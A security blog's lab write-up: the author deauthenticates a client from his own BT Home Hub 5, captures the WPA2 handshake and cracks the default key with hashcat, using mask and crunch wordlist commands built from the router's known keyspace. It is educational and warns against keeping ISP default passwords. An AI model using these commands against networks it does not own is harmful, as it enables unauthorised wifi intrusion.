Innogen security

RECENT BLOG

WPA/2 Handshake Cracking

Recently I was fortunate enough to purchase a PC with a reasonably good GPU spec that could be setup as a password cracking machine. The machine already had a clean Windows 10 Pro instance licensed and installed so it made sense to keep that running as the benchmarks of the GPU would be the same, and I decided to use kali inside of a VM.

Once the kali instance was installed as a VM and a number of tools such as crunch and hashcat installed on the windows machine, it was time to setup a basic lab.

The specs are as follows:

 

CPU: Intel i7-4890K 4GHz
Memory: 32GB
GPU: Radeon R9 R295 x2
HDD(s): 1 x SSD 256GB OS, 1x SATA 2TB as a data drive.

 

Lab Setup

The first router out of my parts box was a BT home hub 5 router, this was used as the test router for cracking and a new post will be added at a later date if I manage to obtain another ISP supplied router.

BT Home Hub 5 Setup:

  • All settings reset to factory
  • SSID: BTHub-5SFC
  • WPA Password: b98eb2bd67

 

 

Kali Setup:

  • Kali Setup and updated as a VM inside VMWare Workstation
  • Alpha USB Wifi: AWUS051NH v.2 mapped as a usb device into kali to allow use in airodump-ng
  • Eth0 interface added with a static IP configured to allow ssh from my laptop

 

Win10 PC:

  • hashcat installed
  • Crunch added
  • Environment variables configured to allow access in command line
  • Hashcat benchmark for wpa/wpa2 = 377kH/s

 

PS C:\Users\Pentest\Desktop\captures> hashcat.exe -b -m 2500
hashcat (v4.0.1) starting in benchmark mode...

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported 
password length.
To disable the optimized kernel code in benchmark mode, 
use the -w option.

* Device #3: Not a native Intel OpenCL runtime. Expect massive 
speed loss.
             You can use --force to override, but do not report 
related errors.
OpenCL Platform #1: Advanced Micro Devices, Inc.
================================================
* Device #1: Hawaii, 3264/4096 MB allocatable, 44MCU
* Device #2: Hawaii, 3264/4096 MB allocatable, 44MCU
* Device #3: Intel(R) Core(TM) i7-4790K CPU @ 4.00GHz, skipped.

Benchmark relevant options:
===========================
* --optimized-kernel-enable

Hashmode: 2500 - WPA/WPA2

Speed.Dev.#1.....:   188.8 kH/s (59.07ms)
Speed.Dev.#2.....:   188.2 kH/s (59.33ms)
Speed.Dev.#*.....:   377.0 kH/s
 
Started: Thu Dec 14 12:21:01 2017
Stopped: Thu Dec 14 12:21:11 2017

 

Attack Setup

Now we have a basic lab setup its time to connect a client to the wifi hotspot and run through the de-authentication attack in order to capture a WPA2 handshake.

Wifi Client:

Wifi Setup:

I used a script that I had created some time ago in order to set the wlan adapter into monitor mode and launch airodump-ng:

script is available on my github:
https://github.com/sbridgens/kali_wifi_setup_script

AP Selection:

The following screen shot shows the selection of the BT hotspot and its associated iPhone client:

Using the information highlighted, I used the following template to populate the commands required in order to capture the wpa handshake:

 

From the commands above we can see the -w switch is set, this sets airodump to capture the packets dump them out to a file named “BTHub-5SFC”.

 

WPA Handshake Capture

Now that everything is setup we are able to use our prepared commands and begin a de-authentication attack on the wifi AP.

Airodump-ng:

Launching the first of our commands shows the AP and its associated client.

 

aireplay-ng de-authentication attack:

The second of our prepared commands sends de-authentication requests to the connected client mac address in order for airodump-ng to capture the authentication process between the client and the AP:

Now the de-authentication packets have been sent we can recheck our airodump-ng screen to see if a wpa handshake has been detected and captured, in this case the highlighted section shows this was indeed a successful attack:

Checking the local file system we see our capture files:

 

Convert the .cap to Hashcat hccapx Format

In order for Hashcat to process the captured handshake it is required that we convert the capture file to a hashcat formatted capture file, more information about this and its format can be found in the following links:

https://hashcat.net/wiki/doku.php?id=hccapx

https://hashcat.net/forum/thread-6273.html

In order to convert the file I decided to use the hashcat website:

https://hashcat.net/cap2hccapx/

Once we download our hccapx, its renamed and placed in the correct directory ready for processing by hashcat:

 

Hashcat Mask VS Wordlist

Based on a large number of discussions online, information relating to the the homehub 5 keyspace is relatively well known and consists of the following rules:

  • 10 characters in length
  • Consists of the following lowercase letters: a-f
  • Consists of the following numbers (missing 0 and 1): 23456789
  • Does not have consecutive characters

Based on this the hashcat rules command line would be:

hashcat -m 2500 -w 3 .\5SFC.hccapx -o .\5SFC_Password.txt -a 3 \
-1 abcdef23456789 ?1?1?1?1?1?1?1?1?1?1

Now the main issue here is that this will process a large amount of keyspaces that contain consecutive characters and thus take longer to complete the attack:

9 Days via mask attack:

Time.Started.....: Thu Jan 04 11:22:20 2018 (1 min, 32 secs)
Time.Estimated...: Sat Jan 13 11:54:47 2018 (9 days, 0 hours)
Guess.Mask.......: ?1?1?1?1?1?1?1?1?1?1 [10]

This is far too long and I am certain we can do better, so its over to crunch in order to create a wordlist based on our ruleset, this will no doubt take a good deal of time to complete creation of the wordlist but we are hoping that we can reduce the overall time in cracking:

Crunch wordlist generation:

PS D:\> crunch 10 10 abcdef23456789 -d 1@ -o bthh5_wordlist.txt
Crunch will now generate the following amount of data: 
1633092903442 bytes
1557438 MB
1520 GB
1 TB
0 PB
Crunch will now generate the following number of lines: 148462991222

As seen this will generate a 1.5TB wordlist, this took approximately 7 hours to generate so after this hope for better things was needed and as we can see I was not disappointed:

4 days 19hours for wordlist attack:

This is a reduction in almost 5 days which is much more preferable.

 

WPA2 Password cracked

As we are somewhat lucky in having a wifi key toward the front of the keyspace this only took 17 hours and 36 minutes in order to crack the default password, I did run a test of a friends captured key that was further down the keyspace i.e: starting with a 5 and still that was cracked in 3 Days and 13 hours.

Hashcat cracked:

Note: the password is not shown by default in the hashcat output and is instead stored in the pot file (providing its not disabled via –potfile-disable) and in the output file we specified with the -o switch: -o .\5SFC_Password.txt.

 

More info regarding the potfile and hashcat output can be seen here:

https://hashcat.net/wiki/doku.php?id=frequently_asked_questions

 

Password File Content:

The following image shows the hashcat output from the -o switch which is essentially the same information stored in the hashcat pot file:

 

Conclusion

Although this is a lengthly write up it can be seen that sticking to the ISP default passwords is really not a good idea, as it does not take large amount of effort in order to crack a 10 character password with the power of modern gpu’s.  The time taken to capture the handshake was mere minutes and to drop the capture file onto the gpu cracking box and walk away while checking once a day was no real effort at all.

With a second set of gpu cards installed this could be halved and it is therefore easy enough to be seen that armed with a larger budget and more powerful gpu setups would reduce this time significantly, with a captured password the next step by a criminal enterprise could possibly be to enumerate your network, capture traffic and potentially install key loggers or other malicious software.

It is worth stating here that BT have stepped up the game with the BTHub-6 by setting the length to 12 chars that have consecutive characters and support both upper and lower case letters plus numbers 1-9, a quick benchmark in hashcat shows the following for this keyspace: [a-z][A-Z][1-9]{12}

 

Time.Estimated...: Next Big Bang (> 10 years)

As we can see we would not attempt a crack at this with current technology and would merely move on to weaker targets or find another route.

Hope this experiment in testing default passwords proves useful.

Innogen security

RECENT BLOG

Exploiting Sudo 1.8.27 The following brief is a quick demonstration of the issue faced by cve-2019-14287. This issue is presented when the user is allowed to run a specified command as any user other than the root user account, specified …

17 Oct 2019

SMB LFI Exploitation The following outlines a very short overview of LFI using SMB in form of a crib sheet. Install Samba: apt-get install samba Remove default Samba config: rm -f /etc/samba/smb.conf Create New smb.conf: vi /etc/samba/smb.conf The following config …

13 Oct 2019

Linux reverse shell without python. During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought. It was found that the go to technologies such as python, …

19 Sep 2019